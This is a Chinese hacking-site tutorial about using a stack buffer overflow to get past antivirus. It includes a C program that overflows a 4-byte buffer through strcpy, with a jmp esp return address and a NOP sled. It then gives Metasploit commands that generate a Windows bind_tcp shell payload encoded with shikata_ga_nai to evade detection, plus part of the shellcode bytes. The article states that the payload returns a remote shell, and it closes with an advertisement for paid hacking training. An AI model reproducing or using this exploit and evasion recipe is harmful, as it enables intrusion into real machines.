栏目

首页 首页 QQ密码查看内容

不法分子利用溢出漏洞可跳过杀毒防护直接进行黑客技术攻击

最近更新| 发布者: 站长-黑杰克| 查看: |

      对于很多网友来说都觉得进行黑客技术攻击是一件复杂和了不起事情,事实上很多时候不法分子都会利用溢出漏洞直接跳过杀毒防护进行攻击的,整个攻击过程的话也并不复杂。
   1、利用溢出漏洞进行黑客技术攻击总体思路。
   不法分子利用溢出漏洞黑客技术攻击,整体思路就是将一些恶意代码直接写入shellcode中,溢出后的话就能执行shellcode以能绕过杀毒软件直接攻击。
   2、发动黑客技术攻击漏洞代码加载内容。
#include <stdio.h>
#include <string.h>
void overflow( char * input)
{
char buf[ 4 ];
strcpy(buf, input);
}
void main()
{
char shellcode[] = "AAAAAAAA"
"\x7b\x46\x86\x7c" //jmp esp
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"shellcode"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90" ;
overflow(shellcode);
}
3、利用溢出漏洞绕过杀毒软件进行黑客技术攻击过程。
A、不法分子直接就能通过msfpayload生成-payload进行跳过查杀,这样就能避免大部分杀毒软件的直接报毒提醒,更有利于展开整个黑客技术攻击,详细情况的话如下图。
 
B、以上步骤完成后就能生成shellcode整个黑客技术攻击展开,最后需要填入如下源代码:
msf > use payload/windows/shell/bind_tcp
msf payload(bind_tcp) > generate -b '\x00' -t c
/*
* windows/shell/bind_tcp - 312 bytes (stage 1 )
* http://www.metasploit.com
* Encoder : x86/shikata_ga_nai
* VERBOSE = false , LPORT = 4444 , RHOST =,
* PayloadUUIDTracking = false , EnableStageEncoding = false ,
* StageEncoderSaveRegisters =, StageEncodingFallback = true ,
* PrependMigrate = false , EXITFUNC =none, InitialAutoRunScript =,
* AutoRunScript =
*/
unsigned char buf[] =
"\xbd\x81\xf6\x2c\x43\xd9\xe9\xd9\x74\x24\xf4\x58\x31\xc9\xb1"
"\x48\x83\xc0\x04\x31\x68\x0f\x03\x68\x8e\x14\xd9\xbf\x78\x5a"
"\x22\x40\x78\x3b\xaa\xa5\x49\x7b\xc8\xae\xf9\x4b\x9a\xe3\xf5"
"\x20\xce\x17\x8e\x45\xc7\x18\x27\xe3\x31\x16\xb8\x58\x01\x39"
   C、一旦这种代码填入后,就可以成功绕过绝大多数的杀毒软件,并成功可以返回shell整个黑客技术攻击就成功完成了。
 

   
文章由天启科技原创,转载请附链接www.goodgoodhack.com。站长负责技术培训QQ9326665,关于—培训介绍




文章由天启科技原创,抄袭必究,转载请注明:
本文地址:http://www.goodgoodhack.com/heikejishu/mimaloudong/1659.html
文章由天启科技站长黑杰克原创,免费学习黑客技术,业务联系站长QQ9326665

最新视频